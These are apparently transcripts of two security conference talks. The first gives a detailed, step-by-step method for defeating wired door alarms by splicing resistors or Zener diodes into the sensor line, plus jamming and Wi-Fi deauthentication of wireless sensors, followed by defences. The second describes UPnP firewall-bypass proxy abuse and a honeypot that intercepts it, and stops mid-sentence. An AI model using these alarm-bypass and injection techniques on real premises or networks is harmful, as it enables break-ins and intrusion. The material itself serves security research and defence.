resistor and then the resistor to the negative line. And so now when we flip this switch current is now getting routed through the resistor. So from this positive line over through the switch through the resistor up to the negative line. And so now the controller sees the same equivalent end of line resistance as it saw when the door was in the normal situation. When we open the door the controller still sees our attack resistance and no alarm is raised. Of course if we flip the switch back and when we open the door now it's all systems as normal. So that's how that attack gets implemented to make this easier in the physical world. I've designed a couple modifications to be made to a standard multimeter to allow you to clip onto the positive and negative leads of the alarm wire and then somewhere downstream on the positive leads so we can cut the line and measure current in between. We can flip a switch to measure the voltage and we can measure then the resistance value between the green and white switches. And then when that's all set up and ready to go we can flip this star switch here and that will engage the attack and re-route power so that the black is connected to the yellow through the resistor and then green gets connected to red and back to the controller. The schematic for this looks like this. I won't go into it in detail but this should be enough for you to design and build your own. And the wiring is this rat's nest here and we can see how it's wired directly into the measurement ports of the multimeter so that it can measure our voltage current and resistance as we perform the attack. So let's look at what this looks like physically. So I have here a system simulating an alarm system. We have our controller which measures the current and voltage being provided, the transmission line, and then our door at the end. So here's our door contact sensor, the end of line resistor. When I open the door it opens circuits it so disconnects and we then get no current and the full supply voltage of 10 being read at the controller. When the door closes again we get a one-to-one voltage divider so the end of line resistor being the same as the internal controller resistance and we get half or five volts and 50 milliamps flowing through. Let's see how we'll attack this. So this is a standard twisted pair wire. So we'll open it up and give ourselves some room to work and then I'm going to use these devices here. They're made by Scotchlock by 3M. They're called the Scotchlock tap devices and I put one wire into here and get that fully in past the little plastic clips. I then take the other wire that I want to connect to the line that I'm tapping into and insert it into the other port of our tap device, insert it all the way and once I'm satisfied that those are fully in I'll clamp it down. So we've now tapped into this wire. We'll do the same on the other side and clamp it down firmly and we now have access to the positive and ground lines. We can now use our homemade alarm wire defeat device and I'm going to clamp onto each of these and I can measure the voltage across now. So we'll put it in voltage mode and then flip this switch to send the red and the black to the leads of our multimeter and we get about 5 volts. To measure the current we need to tap it a second time so I will on the hot wire. I know that this is the hot wire because the voltage measured was positive. We'll take another tap and we'll tap it a second time on this line. This will then force all of the current to flow through our multimeter and we can measure the current when we cut the line in between. So make sure those are firmly on then we can clamp this down and then I'll take this yellow lead it's for measuring current. Make sure it's good and securely on there. I'll flip this into current measuring mode and flip the switch to send the multimeter leads to red and yellow. We get zero which makes sense. All the current is still flowing through this line so we now have to cut that line at which point we'll be able to measure the current. So we've done that and we now measure 50 milliamps. With those two measurements we can now calculate what resistance we need to attack this line. In this case 5 volts divided by 50 milliamps is 100 ohms and that's ohms because it's milliamps so we get our measure in kilovolts and have to convert. So here is a 100 ohm resistor and I'm going to use this as my attack resistor. I'll clip it on to our green and white leads these are our attack leads again making sure that it is fully securely connected. Actually I'll clip on right at the base and you'll see why in a moment. And just to double check flip it back out of current measuring mode. Turn it into resistance mode and flip this switch to send the green and the white to the leads and we can measure that this is indeed 100 ohms. With all that done we're now ready. When I flip this switch to actuate the attack it's going to reroute power instead of going from red through to yellow through the door back to black and back to the controller. It's going to cut the line between red and yellow and send red to green through the resistor and white to black and back to the controller. So I'll flip that switch now. We've now engaged the attack. At this point the door is no longer connected all of the power is going through our attack resistor and I can safely open the door and the controller is none the wiser. The last thing that we can do is to make this a permanent setup. We can wire these in directly using these 3M Scotchlock joins. So I will insert. We need to match white to black. Insert the wire all the way. Insert the wire all the way as far as it will go. And then I will clamp that down to connect those two. I can now safely remove the white and the black leads and I'll do the same to connect red to green. Take another join. Insert that as far as it will go. Whoops! So you'll notice that the controller just detected a short circuit and that's because I accidentally let these two wires touch on the wrong side of the resistor. So that would have been a fail. Had this been a real life circumvention of an alarm. Make sure those don't touch again. And then I can safely remove all of the leads and leave now instituted an attack. The ground wire is still connected but it doesn't need to be and just to illustrate the point I will cut that as well. And so now we've successfully measured what the end of line resistance is and installed a new surrogate resistor that power is flowing through and now of course it's disconnected. Opening the door does not set off the alarm. So we can see in our schematic what was happening there. When we flip this switch to measure voltage it sends the red and the black wire to the leads of our multimeter and it can then measure the voltage. Likewise for the current with the red and the yellow wire and for the resistance sending the multimeter ports to green and white which is what contains our attack resistor. So we can ask ourselves can we do better than that. There were a number of problems with the resistive based approach. One is measuring current is incredibly tedious and requires cutting the line. If we can avoid having to cut the line then we can potentially remove the attack and restore it to its original state if that's necessary. And the second bigger problem is that when we flip the switch to engage the attack two pole switches when you flip them have a brief period of time where neither pole is connected and at that point the controller would see an open circuit. It's very brief and the vast majority of controllers would not be able to detect that but some will and so that's something that we want to avoid. So what would be ideal is if we can tap each line once and have something across it that maintains exactly the voltage that we need and just enforces that and then we don't need to worry about the current. Well such a component actually does exist and it's called a Zener diode. So diodes as you know allow current to flow one way and block at the other. When it blocks the current it acts as an insulator and all insulators will break down when exposed to a high enough voltage. Zener diodes are designed to do this at a lower and at a very specific voltage level. So when we reverse bias the Zener diode i.e. apply a voltage in the reverse direction so it's an insulator above a certain breakdown voltage it turns into a very good conductor. So what that then lets us do is when we open the door and it jumps say from 5 to 12 volts if this is a 5 volt breakdown Zener diode it's now 12 volts it becomes a conductor and it pulls that voltage down to 5 at which point it becomes an insulator again and it doesn't pull it down any further. We get a feedback system where this maintains exactly 5 volts. Let's apply this so we have the same type of system we can strip the wire and right now it's 5 volts we open the door it opens circuits it and it's all the way up at 12 volts and so we'll try to find a Zener diode that will adequately maintain that. First we'll tap each line once. Now we can see the controller in this game but in real life we would just have access to the line so we'll have to add a voltmeter so we can actually tell what is the voltage and so we'll wire that into our tap devices and that tells us indeed it's 5 volts so we need a Zener diode with a breakdown as close to 5 volts as possible. Well 5.1 is pretty close and that should be within the parameters of what the controller deems acceptable and we can wire that in as well. I have to wire it somewhat in reverse because we need this to be in reverse bias so that's why it crisscrosses over itself there but now that we've done that when I open the door it now only increases up to 5.1 volts which is the breakdown voltage of our Zener diode anything above that and the diode begins conducting and pulls the voltage back down to 5.1 volts and that's well within the acceptable range for our controller so it does not trigger an alarm. We can make one addition to our multimeter adapter to help ease this process and that is adding an internal power source that we can flip a switch that will then apply that across the measuring leads of the multimeter and the green and white component leads so that we can actually test a Zener diode and make sure that it pulls down from the supplied voltage to what the Zener should be pulling it down to. Now let's take a look at this in real life and applying the Zener diode attack. So let's see how we'd apply the Zener diode based approach. We have the exact same setup here and we're going to start in the exact same way by tapping each wire but only once this time we only need to do two taps. Of course the door opens we get the same behavior and so we'll try to avoid that happening this time so we can perform the defeat without setting off the alarm. So get that wire onto our tap device, put in the other wire as far as it will go, then we're ready to clamp this down. That's now good and connected. We'll tap the other wire in much the same way. Make sure that's fully on, insert this as far as it will go. Make sure both are in place and we can then clamp this down as well. Of course you want to be careful that these two don't touch. If they do we will short out the system. The current jumps up and the voltage jumps down to zero and the controller will detect that as we're seeing it does here. So in a real life scenario we want to make sure we don't do that but now we can measure what the voltage is as measured by the controller. So we'll take our handy measuring device, clip it on, switch into voltage mode and flip this switch to send the red and the black to the two ports of the multimeter and we read 5 volts. So we need a 5 volt breakdown zener diode which I've got right here and we'll clip it on to our component leads. And we could perhaps also test that this is actually 5 volts. So to do that first along clip we'll leave it in voltage measuring mode, flip this switch to send these two leads to the ports of the multimeter. We get zero which makes sense. I'll flip this last switch to apply an internal 12 volts supply. So we're reading 12 volts when it's open circuited. If I connect it through the zener diode it then pulls it down to 5 volts which is what we want. Turn off that measurement. We're now ready to apply the attack and all we need to do is flip the switch to engage the attack. It then turns on that zener diode and now if I open the door it will regulate the voltage accordingly. It isn't perfect, it's not a perfect match to 5 volts but we see that this would be within the acceptable parameters for the controller here. And of course if I flip the switch back to disconnect it it now operates as normal. I should note that this fancy setup is not actually required because we never cut the line we do not need to switch quickly from connecting the yellow port which isn't used to our attack component. So all I really needed was any old voltmeter that could have measured across here and at that point I can then connect these up any old way I please and with those connected I'm free to open the door as well. And of course if they disconnect it behaves as usual. And so in this case as well as last I could take some joins and connect this in to leave it as a permanent fixture defeating the alarm. After everything we've talked about it may be tempting to say well wireless must be more secure and we should use that instead. Here's why that's not the case. This particular example we have here communicates on 433 megahertz so if we open the door it will send a signal and the alarm is triggered. We can listen to what that signal is with our trusty bow thing so we'll listen to 433 megahertz. And when we open the door we hear that signal. Of course we can use the transmit feature to jam the signal. And so we've now successfully opened the door and the controller has no idea. Now any frequency it might use not just 433 megahertz is jammable possibly not so easily. Wifi is another point that has a known vulnerability and that is the authors. Here's one that I particularly like made by Maltronics but any will do. You can open it up and it'll take advantage of the Wi-Fi protocol to listen for specific devices and kick them off of the network whenever they join. You can use the hardware Mac address to kick off specifically those devices made by alarm manufacturers. So if using wireless is not a great solution what can we do to defend against these attacks? So the first thing is anywhere we run these wires should be in armored conduits and places where it's easy to unscrew a junction box and access the wires underneath should be placed high or out of reach or under a camera to deter the ability for an attacker to do that. We might also consider placing tamper switches in those junction boxes where that is not possible. We obviously want to avoid doing this having bare wires out right at hand level easy for anyone to access. We also want to install all the critical security hardware and the wires for it on the secure side of the door. So we should never have a contact sensor mounted on the unsecure side of the frame like this and the wires themselves should be as well. In particular we want to give some thought to where the wires get routed throughout the building in reference to the security levels at different areas in the building. For instance rooms 103 to 105 are more secure in this case. The wires for them go to this controller in room 103. We would want to run them in the rooms themselves and not in the hallway that has a lower security level. We also want to give some thought to timing as well as spatial aspects so if part of the building is open to the public during some hours but not others it might be possible for an attacker to modify these systems during open hours and then come back afterwards and that's something that needs to be considered as well. We want to avoid at all costs running security wires outside of the building or outside of all security parameters and that's not just if this is in your threat model and let's be honest for the vast majority of installations these types of attacks are not in your threat model but also if the outside of your building is ever exposed to weather. It's a rare phenomenon I know but it can wreak absolute havoc on communications lines when it infiltrates into there. And of course the ultimate of defense here is to use a well-designed encrypted digital line so that would be one that uses nonces to prevent replay attacks and has heartbeats to detect denial of service etc. But that's very expensive and often not justified in terms of that cost. So thank you very much for listening. I hope this has been interesting and a foray into an area of physical security that has not yet been given a huge treatment in this community. I'd like to extend an enormous thank you to Paul, Karen, Jenny and Bobby for their help in preparing this talk in particular to Paul for his expertise in the telecom industry. I encourage you to go try yourselves. All of these games that I've shown in this talk are available for you to try in the comfort of your own home. Give that a try in the Bypass Village at Defconn or at BypassFillage.org and I'd be happy to take any questions either in person at Defconn or over email or Twitter. Thank you very much.
|
Alarm systems are ubiquitous - no longer the realm of banks and vaults only, many people now have them in their homes or workplaces. But how do they work? And the logical follow-up question - how can they be hacked? This talk focuses on the communication lines in physical intrusion detection systems: how they are secured, and what vulnerabilities exist. We’ll discuss the logic implemented in the controllers and protections on the communication lines including end of line resistors - and all the ways that this aspect of the system can be exploited. In particular, we’ll release schematics for a tool we’ve developed that will enable measuring end-of-line resistor systems covertly, determining the necessary re-wiring to defeat the sensors, and deploy it without setting off the alarm. After the talk, you can head over to the Lock Bypass Village to try these techniques out for yourself!
|
10.5446/54196 (DOI)
|
Welcome to my talk. This is UP in Proxy Pot, fake the funk, become a black hat proxy, men in the middle of their TLS and scrape the wire. For begin, I'm Chad Seaman, but around here at DefCon you can just call me Dirt. I am part of the ACMA CERT team. I'm actually a team lead and senior engineer on that team. For those of you unfamiliar with the CERT team, which is probably all of you, you may have heard of some of our research before. We focus on DDoS and emerging threats research, but that typically leads us down the path of malware and botnets and proxies and other good stuff. So before we begin, you're going to see me talk about IoT. A lot of you are going to think IoT means Internet of Things. That's not true for me. It's the Internet of Trash. Whenever you see me say IoT, that's what I mean. So what's this talk about? Well, SSTP and UPnP have been widely vulnerable on IoT devices for nearly 20 years. It's not only possible, but also very easy to turn these devices into proxy servers. When attackers find vulnerable IoT devices susceptible to this kind of attack, they turn these devices into short-lived proxy server and delete their tracks when they're done. If they don't delete their tracks, the tracks will delete themselves. We're going to cover SSTP and UPnP, previous UPnP proxy research campaigns conducted by me, and finally UPnP proxy pot, how it works and findings from a year of geographically distributed deployments. So first things first, SSTP and UPnP. SSTP stands for Simple Service Discovery Protocol. It's a technology that's built for the land, uses broadcast addressing with HTTP over HTTP. It essentially allows machines on a land to announce themselves and or hear announcements from their neighbors or network peers and then expose them to UPnP, which will in turn expose services such as printing and media sharing and network configuration, all that kind of stuff. UPnP is universal plug and play. It's also built for the land. It's good old HTTP and SOAP, SOAP as in XML. It lets machines on a land inquire about the services configuration options offered by that device. It also allows them to access those services and or potentially modify those configurations. So a good example of this is an Xbox, right? An Xbox or a PC game may need you to forward certain ports or certain traffic around the firewall rather than deal with the state of managing that in the net. So that's what UPnP basically enables. It allows your Xbox to go forward and say, hey, poke a hole in the firewall, send everything on UDP, you know, one, two, three, four, over to me. So what is wrong with these technologies? Well, for SSTP, IoT devices are notoriously bad at deploying this correctly. The same is true for UPnP. It's built for the land, but they stick it on the WAN just because, I don't know, just because it was a reflected DDoS vector up and coming most popular MVP, King of the Hill, whatever you want to call it in 2014 and 2015. It's still fairly popular for that, but it's not as popular, mostly due to other vectors becoming more popular, not because it's gotten that much less abused. We're still finding this bullshit everywhere. Older products are still on the internet. Amazingly, newer products and new is there in quotes, but some newer products and by newer I mean within the past few years still have these problems. So 20 years later at a minimum, 14 years, and here we are still having the same old problems. So UPnP, Universal Plug and Play, once again, built for the land, but they seem to just love to stick this stuff on the WAN too. It treats the land as a safe space, which is fine, but the WAN is not a safe space. So when you're listening on the WAN and thinking it's a land, it's a little bit of a problem. It just does whatever it's trusted network peers to help to do, does not require off. There's not really a whole lot protecting it. Information disclosure, it will tell you everything, model numbers, makes, serial numbers. On top of that, it will tell you how to talk to it, what services it exposes, what configurations, what data you can push in and what data you can expect to get out. It facilitates configuration changes on some devices. It makes it very easy to do those changes. In some cases, there are known RCE injections in the UPnP daemons in the soap handling. So your basically soap can get remote command execution on the underlying device. So let's take a quick look at the history here and why I talked about 20 years. The first instance that I could find of somebody exposing something here is 2003, Bjorn Stickler. He came public with a net gear UPnP information disclosure. A couple years later, I'm going to slaughter this guy's name, Armin Hemel, I think, in 2006 gave a talk at the SANE conference and he launched a website called UPnPhacks.org. There's a ton of great info here. His talk really kind of blew the lid off of all the problems that UPnP actually had and all of the potential vectors it could expose people to. And then in 2011, Daniel Garcia gave a talk at DEF CON 19 called UPnP Mapping. It was a great talk. It kind of touched on this proxy and capability and some of the problems with UPnP. I was in the crowd. It freaked me out enough that I think my TP link crowd at the time was actually impacted by this and they went ahead and I went ahead and remoted into my home network and disabled UPnP from the talk while I was in the talk from my phone. So a brief history of UPnP proxy. So UPnP proxy in 2014, like I said, SSDP is the new up and coming DDoS vector starting to see abuse pretty widely. We were at that time we were known as the PLX cert. We were asked to write about it. Start digging into it and put on advisory and all that good stuff. So in 2015, this was happening at the end of 2014. In early 2015, the SSDP research leads me to discover UPnP and it kind of turns on that 2011 talk in my head. I'm like, oh man, I remember this being like a shit show. So in 2016, I decided that since it's been about a decade after the same conference talk and UPnP hacks, it might be fun to revisit this and see how bad this landscape is. Are we talking hundreds of thousands? Are we talking millions? And just talk about and kind of try and bring the fact that this is 10 years later, these things are still a problem and these threats still exist in the real world and everybody just kind of seemed to have forgotten about it. So I start writing that paper. The reason it's relevant is because I had to write a tool chain to test some of these theories and concepts. This is a tool chain here that was for testing the NAT injection capabilities on exposed UPnP devices. So in the top there, you see the SSDP banner that we get back. We take the 192.168.01. We change that to the public facing IP address that we found UPnP responding on. In our SOAP payload, we set that port 5555 is going to point into 192.168.01, which we know is the router at this point on port 80. We then issue that SOAP request via curl. And what we see here is before the injection and after the injection in the scan results there. TCP 80s filtered, you couldn't get to it. But once I opened TCP 55555 and then I hit it in a browser, I am greeted with the admin login page. So that's a little bit of a problem being able to get around the firewall that easy. As I'm doing this research in September of 2016, we get hit with a 620 gigabit per second sustained DDoS attack from a botnet. At that point, the botnet was unknown. It ultimately got named Marai. So as I'm digging into that, I'm inspecting attack sources. I'm seeing lots of IoT. There's a decent overlap with the existing identified UPnP dataset that I had from my decade after disclosure research. I decided that the UPnP info leaks could maybe help. And I start scraping those and poking these devices in general trying to figure out what the heck they are. So it turns out correlation is not causation. The fact that these devices were present in the Marai botnet has nothing to do with Marai. It's just that shitty devices are shitty. And if it's compromisable one way, it's probably compromisable about two or three in the Internet of Trash space that is. So having already written the script to dump the NAT tables as part of the NAT injection testing, I started doing that just to see, you know, maybe there's something weird going on in there that we could figure out. Like I said, it was not related at all. But what I did notice when I did that was there were some really weird entries in some of these devices out in the wild. The entries pointing to DNS servers. They pointed to Akamai CDN servers. They had been pointing at HTTP and HTTPS web servers, which is really interesting. But I have other shit to do. Got a really big botnet. I got to figure out what the hell is going on. So I kind of just stick that in the mental back burner and move on. So on the timeline here, we're down here at the Marai botnet in huge DDoS. So while I'm investigating that, I accidentally uncover the UPM proxy stuff, but I'm too busy dealing with this botnet. 2017 things start to calm down. Marai, at least I have tooling to be able to better track it and handle it. So I start looking back at some of my other research and I decide I'm going to look at what some of those really weird NAT entries were on some of those devices. And I began scanning the entire Internet and dumping all of the NAT tables of all of these exposed UPMP daemons. This is when we uncover the UPM proxy campaigns. So UPM proxy uncovered by the numbers. There were 4.8 million SSDP responders in that data set. 765,000 had exposed UPMP. It's roughly 16%. So of those, 65,000 were actively injected with UPMP entries. That's 9% of the total vulnerable population and 1.3% of the total responders. Of those, 17,599 unique endpoints were identified as being injected in these devices. Typically, if a device had one injection, it had multiples. The most injected destination had 18.8 million instances across 23,236 devices. The second most injected destination had 11 million instances across 59,943 devices. I point this out because it shows two kind of campaigns running simultaneously here. The most injected destination obviously had a lot more instances of injections across a much smaller pool of devices. And then the second most injected destination had a lot less injections but a much larger swath of devices that they were injected on. All in all, there were 15.9 million injections to DNS servers, 9.5 million injections to web servers, and 155,000 injections to HTTPS servers. While I'm doing this research, I'm talking to some fellow researchers and friends and one of the guys goes, hey, I think my friend's working on something very similar. Would you be interested in talking to them? Absolutely I was. I'm very sorry to the researcher I talked to. I don't remember your name and I can't find the email. And Symantec did not give you a shout out on their blog. So thank you for your hard work and I'm sorry. What they ultimately found was that there was an APT group and they were running this inception framework where the attackers were basically using these UP and proxy instances and they were chaining them together. So they would log into their VPS, they would inject a proxy route that pointed to another UP and proxy vulnerable device. They would then use that injection to inject another route, then use that injection to inject another route that ultimately pointed out to their target destination, which was a cloud storage provider for uploading their malware. And then they would use that to upload their malware to the cloud platform. And this is partly to get around detection, right? A lot of times you'll have these lists of known proxies, known endpoints, etc. And when you've got a pool of tens of thousands of home devices that aren't on any of those lists, you're much less likely to set off some alarm bells when you log in and upload a nasty file. So really interesting research. I gave him my tools, he was able to confirm it was what we thought it was. And then I was able to confirm in my data that I could see some of the similar clustering. So what you're seeing here in the graph on the right is two different bubble graphs. The size of the circle is respective to the number of outbound routes found on that device. And then every blue line is pointing in the direction of a relationship. There's an arrow, so where you see the thick blue on one side, that is the tips of the arrows running into one another. And there's clearly two different strategies. The top cluster, you have a larger pool with a handful of routes that go out, and they all point into a smaller pool of devices that may only route to one or two or three things. And in the bottom cluster, you see a centralized, high route out collection, and then they all point out to different endpoints. So it's just a different structure, a different strategy of building that chaining, but the chaining exists and I thought that was pretty cool. So we find all this stuff, but it's not super widespread. I'm just kidding, it's everywhere. So there's 73 brands and over 400 models that we could identify. And it's important there that I say we could identify, because we were only able to successfully fingerprint with confidence about 24% of these based on information leaks. And those information leaks weren't just what came from the UPMP Damage. Sure, it helped a ton because it's a super chatty, it exposes quite a bit of information about the device, like I said. But we would also go so far as to attempt to see what other reports were there, SSH banners, anything like that that we could potentially fingerprint on, we tried. And still, we can only get about 24%. So that is quite a considerable amount. 73 brands and 400 models is a nice chunk, but you got to remember that there's 76% that we couldn't even identify. So who knows what they are. This publication goes live. And you know, the crowd goes mild. Nobody really cared. It didn't really get a lot of attention. I was pretty disappointed. I thought it was a very cool finding. But and I'm downplaying that a little bit. So a couple people cared. The people that needed to care care. So I'll take that as a win. The research did get some industry attention through some some trust groups and work groups and stuff, did get elevated and passed along. And it was ultimately used to help some ISPs support the case internally for cleanup and, you know, sanitation efforts. So progress is made behind the scenes. Some networks start filtering SSDP. That's all good. You'll see that the result of that in the next couple slides. Ultimately, I get an email from a journalist. She's doing some work. And she was recording this new show. Her name is Justine Underhill. And she wanted to talk to me about UP and proxy because the episode she was recording was on IoT and security and everything else. So while we're recording this video, I decided that, you know, she's asking questions about how hard is this? How long does it take? How much does it cost? And I'm like, well, I'll just I'll just show you. So I pull out the laptop, jump on the internet, run Z map and I hit the first 1000 things that respond to my SSDP probe. And then I start dumping their NAT tables. And while I'm sitting there showing her this, I'm like, man, I think we just found something new. Like this, this wasn't in the previous scans. And this is how I accidentally discovered the eternal silence stuff, which it was cool because we, we didn't really have a solid case. I had proposed that attackers could use this to route around the firewall, but we didn't really have a solid proof from our existing scans that that was occurring yet. So these are what the injections look like after they go through our logging process and are converted into JSON. You can see that they are targeting IPs inside the land 192.168.10 space, probably from the information leak from the SSDP banner. And then so like there on 166, you can see that they tried to open a port forward to 139 and port 445. So they're injecting routes into the land space. And they are targeting Samba or SMB. We named it eternal silence because Samba and SMB are clearly being targeted by eternal blue pretty heavily at that point. And the Spanish there, there's in the new port mapping description, there's some Spanish, and I am terrible at Spanish. So my gringo Spanish is galete silenciosa, which go ahead and laugh at me. But it roughly translates to silent cookie. So you PMP eternal silence is discovered and published. Ultimately, 3.5 million SSDP responders. So some of that cleanup effort worked. We found almost a million less devices than we did in our previous research. 227,000 instances of exposed UPNP 45,000 had active eternal silence injections. There's no way to really know what they were up to. But based on what they were targeting, the eternal blue link is an educated guess. And that educated guess is based on if I were evil. That's what I would do, right? I've got this surefire SMB exploit. But everything that's running it on the internet has already been popped. But you know what? If I can find a way around some of these firewalls, I can probably find some devices that are still listening on that that haven't been patched. And now I've got a new place to drop my ransomware. So that's cool. All this research is cool. But we still have problems. The research up to this point, it has been via passive identification. This requires scanning the entire internet regularly to find stuff. It's time consuming. We get lots of hate mail and threats for scanning stuff. People don't like when you scan the internet. Guys, relax. Relax. You're allowed to scan the internet. It's not a crime. Okay. It's still time consuming. It results in a ton of logs because we're dumping all of these net tables. So it ends up with gigs and gigs and gigs of logs per scan. On top of that, it's very time sensitive, right? We know that the attackers can delete their entries. We know that the entries time out. So the odds that we're finding anything at all is pretty surprising, especially when you consider that that that reality. So the real problem here is that we can tell where they're doing stuff and where they're pointing stuff, but we don't actually have visibility into what they're doing with it. So if we see them injecting, you know, port 25, we assume it's spam, but we have no idea. They could be dropping O days against, you know, SNTP servers, no clue. So we need to fix that. And that's where UP and proxy pot kind of enters the fight, if you will. So what is UP and proxy pot, the 50,000 foot view? It listens for SSDP probes and it directs attackers into a fake UP and P instance. The UP and P and emulation is good enough to get to the injection phase. It's not a full implementation. It could be improved, but it's good enough. From there, we offer on the fly proxy capabilities with man in the middle content inspection and logging TLS stripping is also supported. All of this is easy to modify in the sense that if you want to pretend to be a different device, all you have to do is change some XML files and some text files on disk. It doesn't require code changes to change your device profile per se. So it offers session based P cap capabilities. So you can come back later and inspect the traffic that went over the sockets and it's written in go, Lange and bash. So SSDP emulation, the SSDP response that is currently in the project was lifted directly from the most abused device that we discovered during the UP and proxy research. It's stored in a flat file and disk. You can change it without modifying any code. The one gotcha is if you update the SSDP banner and it changes the port on which the UP and P Damon is listening on, this is what the attackers pivot on. So you will need to change the listening port in code that the UP and P Damon listens on. I didn't have a configuration file set up when I wrote this in my initial thing. It's an improvement that could be made. UP and P emulation. So the UP and P responses are lifted also from those same most abused devices. All the HTML and XML stored in flat files updating them requires no code changes. UP and P emulation serves basic files, handles NAT interactions. The attacker supplied SOAP is parsed and handled via Regex. It will respond with proper error payloads if criteria are not met or XML is malformed. Responses must contain attacker supplied data so that these responses use standard printf formatting. So if you need to change your thing and the attacker supplied port needs to be in this chunk of XML, you can just put the %d and it will be there. So on the fly proxy, this is kind of unique because the attacker gets to control their proxy configuration themselves. So we had to support that. So attackers submit their proxy config via SOAP just like they are talking to UP and P. We parse them and then create a session of sorts and then we scrape and log plain text across the proxy session in both directions. If they are proxying to TCP 443, it's a special use case and we assume that connection is a TLS connection and we do some special man in the middle of there. So stripping TLS and this is a hard slide to read. It's very upsetting. So attackers actually do some verification when they are using the TLS connections. The initial deployment saw connections but they would bail before actually pushing data across that connection. So we have to do some verification. Attackers are fingerprinting certs. Initially they were doing this via the subject line. There is an automated cloning process where we began by pulling the domain out of the client hello. We then go forward to the injected endpoint and we get the cert with the respective SNI that was provided in the client hello. We copy the remote cert and we mirror it into a self-signed clone cert and this all happens in real time when they first establish their connection. This allows us to, it was allowing us to bypass their fingerprinting and actually get plain text out of the TLS flows. Literally yesterday as I'm recording this, literally yesterday it stopped working and I don't know why. I don't know if they've changed their fingerprinting. I don't know what is really going on but I have a year and a half, well I have months worth of logs at this point that have this functional and now that it's about to go open source it breaks. So I'm sorry. I hope we can figure it out. So the other feature is the automated p-capping. The project uses GoPacket. It allows us to create p-caps on the fly using Berkeley packet filters that are scoped to the individual sessions, the individual proxy sessions. As attackers interact with the proxy injection the p-caps are automatically collected. If you find something interesting in the logs you can find the associated p-cap and see the entire session easily in whatever your favorite, you know, p-cap packet muncher is, wire shard, TCP dump, whatever. If you run out of disk space on your deployed honeypot this is probably why. That is from a single machine down there at the bottom. You can see that we had 81,100 p-caps that we ultimately collected for different sessions and of those p-caps it resulted in almost five and a half gigs of disk consumed. So this part hurts as well. The initial deployment was for one year and it was four nodes deployed across a single VPS provider. There were geos from Dallas to London to Tokyo. 300 gigs of p-caps and logs were ultimately collected. Hundreds of millions of captured proxy sessions and billions of log lines. And you know I downloaded all that and I destroyed the cluster and then I accidentally lost the backup. So I figured this out literally like a day after I submitted the CFP to DEF CON. Luckily I had a couple months before everything was accepted and approved. So I was able to deploy a smaller four node cluster for the two months between CFP and what you're seeing now. So ultimately four nodes deployed US, UK, India, Japan. 39 gigs of p-caps and logs collected 230,000 captured proxy sessions and 22 million lines of logs. The good news is I did have some notes so not everything was lost from the previous deployment and the trends that I saw in the new data are spot on for the trends I saw in the old data. There's not a whole lot's changed just a lot less data to back up the claims but I promise you it's pretty much identical. So observations. The first thing is that they don't blindly inject their their proxies. They actually come and do some testing. So injections they first come and they insert a test proxy instance. A test proxy instance. Once they confirm that it works then they inject a real proxy. They utilize it and then they attempt to delete it. I say attempt well we'll cover that. So this is the process of an injection. We see them show up with their msearch banner. We respond with our ssdp response here and you see that we point them to 192.168.01 on port 2048 and then etsylinuxigdgatedesk.xml. We see them come back within the same second and they then request that. You can see ssdpn and upnpn there. They request that and from there they think that we are the device they're looking for. Once they have confirmed that then they come back and they attempt to add their port mapping. So in this case they're adding an entry that will force us to listen to on port 22280. It's a tcp socket and any traffic received on that is going to be redirected to port 80 on the host at 74.6231.21. You can see down there the new port mapping description kind of mirrors the external port that they use that's sync and then a number and then the new lease duration is 600 seconds. So this will time out after 600 seconds. Then they come back and they utilize that newly injected proxy. So here you can see they sync 2280. Everything up there between the curly braces is the proxy configuration. We can see the source. We can see where ultimately they're going to point to. So 93191 3976 on port 57388 is going to send traffic to 74 6231 21 on port 80. Ultimately we intercept a get request to YAHU with no headers so it's super easy to spot and YAHU because they move to HTTPS ultimately issues a 301 permanently moved and this is all they really need for their fingerprint. Once that's done we see the attacker come back and they attempt to delete the port mapping but they send us malformed XML. What's interesting here is that the malformed XML apparently has I don't know if they forgot a null at the end of the envelope but it continues as a buffer over read and what we ultimately see here is XML that is not related to this request but it just happened to neighbor it in memory. What's interesting here in this case it's the same injection they just sent us. What isn't that interesting? What's more interesting and there are other instances where there is XML information leakage from the buffer over read from other devices that they may have been talking to recently. In this case at some point they were talking to a D-Link DSL 2730U. If you check that out you can see that it is a popular item on a popular e-commerce website. It's actually a choice item on that e-commerce website and it has 3100 readings. For 1,329 rupees you can buy this device and that's about $19 US I believe and you can inadvertently be a Black Hat Proxy too. These are some of the top talkers or sorry some of the top injected test endpoints. You can see there's Akamai Yahoo a few others in there. That top one is clearly the standout winner the 893910512 and they're going to ip.shtml. That's a special page. It returns your public-facing IP address which here I've clearly modified it and then this UBCIEG plug that they use for some kind of identification I'm assuming. There's also a very large campaign being run against Google. This is predominantly all the TLS traffic. It's very weird. I don't know what it is. Out of the 59,924 intercepted requests going across the TLS sockets all of them 100% targeted Google. This is click fraud SEO. I don't know what it is. This is an example of a caught request. They're searching for a Cisco spark board factory reset. We can see their accept language. We can see their cookies. The user agent they used all that good stuff. We can see even they seem to be coming from Dallas based on the information linkage in the URL but I can't really confirm that. I can't really confirm that. Also here we see the response. We get a 200 okay for their search. We see the cookies. It's not here but we would actually have the full page content and everything. It's disabled in this case because that was a lot of log lines. I mean gigs and gigs and gigs at Google pages. In total they sent 57,237 search terms. There are no really clear patterns. They're from all different geos that they target. They use a ton of different user agents. And each request gets basically one search per session. So you can see that top result there has only shown up 55 times out of 57,000 requests. It's just a search for the word Samsung in quotes which is weird. Some of the funnier searches that were captured 72-hour deodorant, antivirus download now, Marlboro summer camp, leather trousers outfit, fa fa fa fa slot hack. I don't even know what that is. I should probably Google some of these to see but I haven't yet. And like I said they're very geographically distributing their stuff across the Google platform. There are domains in here that I don't even know what country they affiliated with. So did you know there's a dot bj.as.jm.md.ee. They're clearly targeting Google.com the most followed by co.uk but still there's so many that they're hitting it's crazy. This is the user agent profiles. So they sent 293 different user agents. And then you can see there's almost normalized clusters of user agent distribution across the abuse. And these are some of the top talkers. So it's not what you'd expect, right? You would, I guess, I mean, I guess kind of it is what you'd expect if it's a single abuser. But the the nature of the queries almost make it seem organic. It doesn't seem like it has an abuse pattern. It almost seems like real end users. But then it's not real end users showing up and popping holes in this stuff. They're all being ferried through a handful of top talkers. And then you have your outliers. If we look at the top 10, we see that Worldstream, Worldstream, Worldstream, Worldstream, OVH, Worldstream, OVH, Worldstream, OVH and Avast. So let me just put it this way. If you work at Worldstream, find me at the bar. If you work at OVH, find me at the bar. If you work at Avast, find me at the bar and I'll buy your drink if you tell me what the hell is going on there. Because I don't know why Avast would be showing up in this data set, but there they are. So some theories on this. The queries to me seem too oddly human. They're in a bunch of different languages. They're stuff like, you know, the best car 